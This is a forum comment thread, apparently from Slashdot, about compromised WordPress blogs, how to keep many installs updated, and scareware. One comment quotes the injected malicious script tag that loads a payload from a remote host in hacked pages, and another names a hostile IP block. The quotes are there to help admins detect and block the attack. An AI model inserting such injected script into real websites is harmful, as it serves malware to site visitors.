Selectively disabling parts of the system to prevent the user from uninstalling the malware. Some may also prevent anti-malware programs from running, disable automatic system software updates and block access to websites of anti-malware vendors.

At least Norton tries to provide a working removal tool [symantec.com] at no charge. The only problem I've found is that it's made deliberately inaccessible to blind users (with a CAPTCHA) so that malware doesn't automatically run it on every computer that it tries to infect.

Oh Lord, please don't say that name! Poor Jim is still rocking himself in the corner going "It just won't uninstall! Why won't it uninstall? It just won't go away" after the last wave of Norton infected laptops came through and we have finally got his mumbling quieted down, please don't give Jim a flashback!

As for TFA this is why I recommend the combo of Win 7 with either Avast or Comodo IS along with Comodo Dragon with ABP. Windows 7 has DEP and ASLR along with UAC and Comodo Dragon is able to take advanta

Why do they always focus on the crap that's left behind when they analyses these things? I want to know how they managed to get that stuff on those servers so I can check my own. Was is an old and vulnerable WordPress or was it some 0-day they used?
For some reason they always focus on the effects and not on the causes.

Many of the blogs compromised in these recent attacks were running outdated WordPress versions, had vulnerable plug-ins installed or had weak administrative passwords susceptible to brute force attacks, said David Dede, a security researcher with website integrity monitoring firm Sucuri Security. "It seems the attackers are trying everything lately."

Some of that is Wordpress' fault for not having an easy way to run mass upgrades. My employer has 15 different sites running on Wordpress and the fact that I have to log in to each one manually after upgrading the files and click a link to handle the database update is annoying.

Some of that is Wordpress' fault for not having an easy way to run mass upgrades. My employer has 15 different sites running on Wordpress and the fact that I have to log in to each one manually after upgrading the files and click a link to handle the database update is annoying.

This drove me nuts at my current job for about 2 months - you need Wordpress Network [wordpress.org].

There's the easy way and the hard(er) way to do this:

This [wordpress.org] is the official easy way, but it's never worked for me (last tried in Spring of 2011). The nice thing is that it's all stuff built into WordPress, so you should be able to do it without any problems. I'd say it's probably worth giving this a try with one site, and if it works, run with it.

This [bavatuesdays.com] is more down and dirty way that will definitely work, and is more or less how I did it. A little SQL editing never hurt anyone.
Also, this [sillybean.net] is a great companion to the bavatuesdays link. He goes on about his DNS in the first few paragraphs, but the second half of that post has some good details about where files need to be, and how links and such need to be updated.

Once you have a network, you a fantastic "Update Network [wordpress.org]" button. Boom. Take the rest of the day off.

WordPress is extremely easy and quick to update. You can click a single button and update every single plugin and theme, or another button to update core. That's it. If you're upgrading by manually uploading files to a bunch of different servers for some reason, you should at least look into something like updating with Subversion [wordpress.org] or using multisite and just updating once for every site.

I used to love hand compiling everything but then I got my first full time sysadmin job. The job came with 20 servers and thankfully 15 of them ran Debian. When you have to do something repeatedly it gets old quickly so now I want the OS to do as much as possible and script most of the rest.

LOL. I've been a full time sys admin for ten years -- first with Solaris and FreeBSD servers, then in my current job with about 15 or so Gentoo (!) servers plus my laptop and a desktop. We migrated to Ubuntu about three years ago. In all honesty, we do a much better job of updating the Ubuntu servers than we did the Gentoo servers because it is so much easier to do, but I am starting to loathe my Ubuntu laptop. It's a lot easier to get wireless working in Ubuntu than Gentoo, but Unity, nVidia drivers*,

Well my clicking-averse friend, you need managewp.com. One login and a click or two, and you've updated all those 15 installs. Either that or migrate everything to multisite (Backup Buddy is great for that).

You mean "the fact that I have missed to write some working update/deployment script is annoying"?
Come on - it's not that hard. Just rsync anything but wp-content. Make sure they all have the same plugins installed but not necessarily activated and sync the plugins folder, too. That's for starters. The elegant way involves delivering images and "uploads" from a CDN and simply unpacking the new versions over the old ones by rsync, ftp or wget...

I personally think it's mostly a popularity thing, since WordPress pretty much owns the blog market. I think the other problem, however, is just with how simple they've made it to accidentally backdoor your site. There are thousands of plugins for WordPress, installable with just a couple of clicks, written by people who know nothing about security, or have possibly even maliciously left holes in their plugin. Unlike large projects that are generally maintained and reviewed by dozens of people, a plugin

A number of years ago, I encountered a fake Microsoft security warning while using my Linux computer. It said that Microsoft had detected viruses and spyware on my computer. This was on a Linux computer that did not have any Microsoft products installed on it.

It offered to do a free online scan of my hard drive. Despite clicking on No, a progress bar appeared as it started to do a fake scan of my hard drive. After about 60 seconds, it said that it had finished scanning my drive C. It then said that several

So looks like the injected code
</DIV> <!-- END body-wrapper -->
<script src="http://ionis90landsi.rr.ru/mm.php?=1"></script>
</BODY>
</HTML>
would be take care of with NoScript as long as your white list is short and doesn't contain rr.nu in this example.

It looks like the first step in the infection is via an IP (194.28.114.103) belonging to Specialist ISP of Transnistria [wikipedia.org]. That has featured before on Slashdot in this story [slashdot.org].

The block 194.28.112.0/22 is simply all evil (I've documented it here [dynamoo.com] in the past), there's no reason to send traffic to it at all, blocking it is a good option.

Exactly. It's a country that doesn't exist in the eyes of most other countries, which makes it beyond the reach of international law enforcement. There are other countries in the world like that, the difference with Transnistria is that it has a somewhat modern infrastructure.

I may be missing something - again, I'm a slackass. Anyone else have other advice for our admin-challenged friends besides "get a real software package"?

By the way, I was trying to lock down one of my WP installs to only allow authed users access to posts. However, WP does not put the assets for post - usually in wp-content/uploads - behind the auth wall. It's just out there for the whole world to see. It was a simple fix to rewrite the.htaccess config for this directory to redirect to an auth script, but still it still shocks me how insecure this app is.

BTW: why is Adobe allowed to - by default - check the box on their flash updates to also install Norton on the victims computer? How many trusting civilians (think: grandmothers) end up with borked computers with conflicting AV programs solely due to corporate greed? I'm willing to bet this check box (if it even appears) is NOT checked by default in the EU market. Man, I miss government FOR the people...